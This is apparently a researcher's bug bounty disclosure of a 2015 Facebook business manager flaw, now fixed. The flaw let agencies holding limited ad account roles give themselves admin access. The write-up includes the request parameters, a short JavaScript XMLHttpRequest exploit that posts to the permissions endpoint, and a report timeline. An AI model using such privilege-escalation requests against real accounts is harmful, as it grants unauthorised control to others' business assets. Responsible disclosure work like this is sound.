Bypass ad account roles vulnerability 2015

I discovered a vulnerability in Facebook that allowed a normal user in ad account to get unauthorized admin access in that ad account

admins in ad account  can add any user to their ad account with these 3 type of  role :

1. admin
2. advertiser
3. analyst

read more about these roles link

Facebook launched business manager in 2014 to help businesses and agencies manage their Facebook Pages , that can be accessible from business.facebook.com

in Facebook business manager, a business account can assign agencies for own ad accounts
so that agencies give access to ad accounts with limited access(owner set this access in assign agency process)


the vulnerability that I found, allow these agencies with normal role(2,3)  change their own access to admin!

Scenario :

I have business account and I give analyst permission to another business account to work on my ad account!
that business account can bypass roles and get admin access!

Details:

request body :

act: [ad_account_id]
user_id: [user_id]
add_user_permission: [permission : 1001 admin, 1002 advertiser, 1003 analyst ]

Exploit :

var Xhr;
Xhr = new XMLHttpRequest ();
Xhr.open("POST","/ads/manage/settings/permissions/?action=add_user",true);
var p = "act=__ACCID__&user_id=__USERID__&add_user_permission=__PERM__&__a=1";
p += "fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value;
Xhr.send(p);
__ACCID__ = ad account id
__USERID__ = this user will be new admin ;)
__PERM__ = permission (1001,1002,1003)

POC : 

Timeline: 

•  Mar 14, 2015 01:27am: Initial report
•  Mar 17, 2015 03:35am: Bug acknowledged by security team
•  Mar 17, 2015 08:00am: Security team member Reginaldo informed me the vulnerability fixed
•  Mar 20, 2015 10:08pm: Facebook Security Team rewarded me with a $8000.